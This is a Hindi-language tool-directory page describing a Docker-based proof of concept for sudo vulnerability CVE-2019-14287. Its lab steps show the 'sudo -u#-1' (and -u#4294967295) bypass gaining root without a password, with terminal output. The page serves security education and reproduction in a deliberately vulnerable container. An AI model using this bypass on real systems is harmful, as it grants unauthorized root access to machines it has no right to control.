Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
poc-cve-2019-14287 — # Docker-आधारित PoC जो CVE-2019-14287 sudo विशेषाधिकार वृद्धि को Runas उपयोगकर्ता प्रतिबंध बाईपास के माध्यम से प्रदर्शित करता है, चरण-दर-चरण पुनरुत्पादन निर्देशों के साथ। | Kitploit
उपकरण/GitHubGitHub/lemonadern/poc-cve-2019-14287
विशेषाधिकार वृद्धिकंटेनर सुरक्षाभेद्यता विश्लेषणशोषणलर्निंग और शिक्षालैब और अभ्यास
GitHublemonadern/poc-cve-2019-14287

poc-cve-2019-14287

# Docker-आधारित PoC जो CVE-2019-14287 sudo विशेषाधिकार वृद्धि को Runas उपयोगकर्ता प्रतिबंध बाईपास के माध्यम से प्रदर्शित करता है, चरण-दर-चरण पुनरुत्पादन निर्देशों के साथ।

रिपॉजिटरी देखें
141 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2019-14287 का PoC

अवलोकन

यह sudo की भेद्यता (CVE-2019-14287) को Docker कंटेनर पर पुनरुत्पादित करने वाला एक नमूना है।

अभ्यास के चरण

  1. docker compose up -d से कंटेनर शुरू करें
  2. docker exec -it vulnerable_sudo_app bash से कंटेनर में प्रवेश करें
  3. whoami और id कमांड चलाकर पुष्टि करें कि आप एक सामान्य उपयोगकर्ता हैं (root नहीं)
    root@kitploit:~
    $ whoami
    user1
    $ id
    uid=1000(user1) gid=1000(user1) groups=1000(user1)
    $ id -u
    1000
    
  4. पुष्टि करें कि sudo -u#0 whoami और sudo -u#0 id -u निष्पादित नहीं किए जा सकते
    • uid (-u विकल्प) के रूप में 0 (root) निर्दिष्ट करके निष्पादित करें
    • पासवर्ड माँगा जाता है, लेकिन पासवर्ड पता नहीं है, इसलिए निष्पादित नहीं किया जा सकता
    root@kitploit:~
    $ sudo -u#0 whoami
    [sudo] password for user1:
    $ sudo -u#0 id
    [sudo] password for user1:
    $ sudo -u#0 id -u
    [sudo] password for user1:
    
  5. sudo -u#-1 whoami और sudo -u#-1 id -u चलाकर पुष्टि करें कि बिना प्रमाणीकरण के root के रूप में कमांड निष्पादित किए जा सकते हैं (भेद्यता का पुनरुत्पादन)
    • -u#4294967295 के साथ भी ऐसा ही किया जा सकता है
    root@kitploit:~
    $ sudo -u#-1 whoami
    root
    $ sudo -u#-1 id
    uid=0(root) gid=1000(user1) groups=1000(user1)
    $ sudo -u#-1 id -u
    0
    

संदर्भ

  • CVE - CVE-2019-14287
  • Potential bypass of Runas user restrictions | Sudo
  • sudo की भेद्यता (CVE-2019-14287) के बारे में सारांश - Qiita
टूल डाउनलोड करें